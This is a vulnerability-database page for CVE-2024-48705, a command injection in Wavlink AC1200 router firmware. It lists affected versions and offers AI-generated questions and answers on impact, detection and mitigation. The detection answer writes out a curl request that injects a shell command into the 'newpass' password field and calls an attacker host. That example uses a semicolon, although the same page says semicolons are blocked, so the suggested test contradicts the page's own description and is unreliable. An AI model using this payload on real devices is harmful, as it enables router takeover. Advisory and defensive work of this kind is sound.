CVE-2024-48705
BaseFortify
Publication date: 2025-09-02
Last updated on: 2025-09-04
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wavlink | wl-wn531p3_firmware | m32a3_v1410_230602 |
| wavlink | wl-wn531p3_firmware | m32a3_v1410_240222 |
| wavlink | wl-wn531p3 | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2024-48705 is a post-authentication command injection vulnerability in Wavlink AC1200 routers running firmware versions M32A3_V1410_230602 and M32A3_V1410_240222. It exists in the "set_sys_adm" function within the "adm.cgi" binary, specifically in the password reset process. The vulnerability arises because the "newpass" field provided by the user is not properly sanitized before being used in a shell command. Although the code attempts to block semicolons, it fails to prevent other command injection vectors. This allows an authenticated attacker to inject arbitrary shell commands via the "newpass" parameter, which are then executed by the system, potentially compromising the router. [1]
How can this vulnerability impact me? :
This vulnerability can allow an authenticated attacker to execute arbitrary shell commands on the affected Wavlink AC1200 router. This could lead to full compromise of the device, including unauthorized access to sensitive information, modification of router settings, installation of malware, or using the router as a pivot point to attack other devices on the network. Because the attack requires authentication, it is limited to users who can log into the router's web interface, but once exploited, it can severely impact the security and integrity of the network. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the command injection in the password reset functionality on the router's web interface. Specifically, sending a crafted POST request to the "/cgi-bin/adm.cgi" endpoint with parameters including "page=sysAdm", "username=admin", "SYSPASS" (current password), and a specially crafted "newpass" parameter containing shell commands can reveal if the system is vulnerable. For example, using curl to send a POST request with a payload in the "newpass" field that attempts to execute a command (such as contacting an attacker-controlled server) can confirm the vulnerability. Example command to test detection: curl -X POST http://<router-ip>/cgi-bin/adm.cgi -d "page=sysAdm&username=admin&SYSPASS=<currentpass>&newpass=validpass;curl http://attacker.com" -d "NEWPASS2=validpass". Successful execution or network activity to the attacker server indicates vulnerability. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the router's web interface to trusted users only, disabling remote management if enabled, and avoiding password resets via the vulnerable web interface until a firmware update is available. Since the vulnerability requires authentication, ensure strong current passwords to prevent unauthorized access. Monitoring network traffic for suspicious outbound connections triggered by exploitation attempts can also help detect active attacks. Ultimately, applying a firmware update from the vendor that addresses this command injection vulnerability is necessary once available. [1]